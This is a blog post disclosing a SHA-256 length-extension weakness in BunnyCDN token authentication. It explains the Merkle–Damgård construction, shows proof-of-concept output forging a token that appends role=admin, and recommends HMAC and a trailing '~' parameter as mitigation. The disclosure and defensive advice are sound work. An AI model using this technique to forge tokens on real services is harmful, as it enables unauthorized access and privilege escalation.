Length-extension attacks are still a thing

2 days ago 1

SHA-256 is probably the most widely used hash function today. It has resisted all known practical cryptanalytic attacks, benefits from hardware acceleration on many CPUs, is implemented almost everywhere, and complies with standards like FIPS. It seems like a natural, safe choice for nearly everything.

The intuition many people have is that because it’s computationally infeasible to find an input that produces a specific hash (a preimage), it must also be impossible to compute a valid hash for a related input.

Unfortunately, that intuition is wrong.


The Merkle–Damgård Construction

SHA-256, SHA-512, and many other legacy hash functions are built using a design called the Merkle–Damgård construction.

By design, this construction allows a property that cryptographers learn about very early, but that many developers are still unaware of: the length-extension attack.

Under certain conditions, given the value of H(x), it’s possible to compute H(x || y) without knowing x.


How the Attack Works

Consider this example:

H("secret key || logged=true")

Using SHA-256 as the hash function H, the result is a 256-bit value that appears random to anyone who doesn’t know the secret key.

It’s generally believed to be impossible to compute a valid hash for a different message without the secret key, which makes this construction appealing for simple authentication schemes.

A typical use case is URL or cookie authentication tokens. For example, a server might issue tokens like:

token = H("secret key || logged=true")

Then it verifies incoming requests by checking that the provided token matches what it would compute internally.

This approach is common in web services, including CDNs.


A Real Example: BunnyCDN Token Authentication

Bunny.net provides a convenient feature called BunnyCDN Token Authentication, documented here:

How to sign URLs for BunnyCDN Token Authentication

With this feature, the CDN can automatically reject unauthorized requests based on tokens computed from query parameters and a secret key.

However, SHA-256 allows something unexpected. Given H("secret key || logged=true"), it’s possible to compute H("secret key || logged=true || additional data") without knowing the secret key.

That means authentication tokens based on this scheme can be completely broken.


Proof of Concept

Here’s a simple proof of concept and its output:

Original query: ?file=report.pdf Original token: mwKyexgzJiB53wvtaU5WLQqiXELRL33ZA50UpaDpT7o= Successfully forged token! Guessed secret length: 16 bytes Forged token: +WIhApyRDad62D3BsDnZk926mxUB+3LGEhNK7UEmnIQ= Forged query bytes: b'?file=report.pdf\x80...%26role%3Dadmin' Server still accepts forged token: True

The second token was computed without the secret key, using only the original token.

An attacker could append role=admin to the query string and generate a valid token for the new URL. Because the token is valid, the server would accept it.


Why This Matters

This vulnerability isn’t specific to BunnyCDN. It’s a common pattern in many systems that use raw hash functions for authentication.

The fact that a secure-looking hash function like SHA-256 allows this is counterintuitive, and it’s likely that many other services are currently exposed to the same risk.


How to Do It Right

The most common solution is to use the HMAC construction, which is widely supported and well-studied.

HMAC explicitly separates the key and the input, preventing this type of attack.

Alternatively, you can use a modern hash function or MAC that is not vulnerable to length extension. Good options include: SipHash, BLAKE2, BLAKE3, KMAC, and SHAKE / TurboSHAKE.

Virtually all modern primitives avoid this issue. One notable exception is AREION-MD.

Another valid approach is to put the key at the end instead of the beginning. Suffix-keyed MD constructions were recently proven to be secure. Although the proof assumes the key fills the last block, padding is unlikely to be necessary in practice.


Mitigation for BunnyCDN

In BunnyCDN’s specific case, there’s an important detail: the hash is computed on query parameters after they are lexicographically sorted.

An attacker can only append data, not insert it before existing parameters. So if a file parameter already exists, an attacker could add role=admin but not admin=true, because it wouldn’t be a suffix.

This allows for a simple mitigation that doesn’t require server-side changes and doesn’t break backward compatibility: add a dummy parameter named ~ to the query string.

For example:

The tilde character ~ comes lexicographically after all alphanumeric identifiers, so it will always be sorted last. This makes it impossible for an attacker to add meaningful parameters afterward.

It’s a mitigation rather than a full fix, but it’s simple and effective for existing deployments.


Conclusion

Length-extension attacks are not new, but they still catch many systems off guard. Any service that builds authentication tokens using H(key || message) with SHA-256, SHA-512, or similar functions is likely vulnerable.

Using HMAC or a modern hash/MAC function is the proper fix. For systems like BunnyCDN, adding a parameter such as ~ at the end of the query string provides a quick mitigation.

Bunny engineers are aware of the issue and are working on a fix. They were also informed about the possible mitigations, including the simple documentation change that mitigates this attack.

Read Entire Article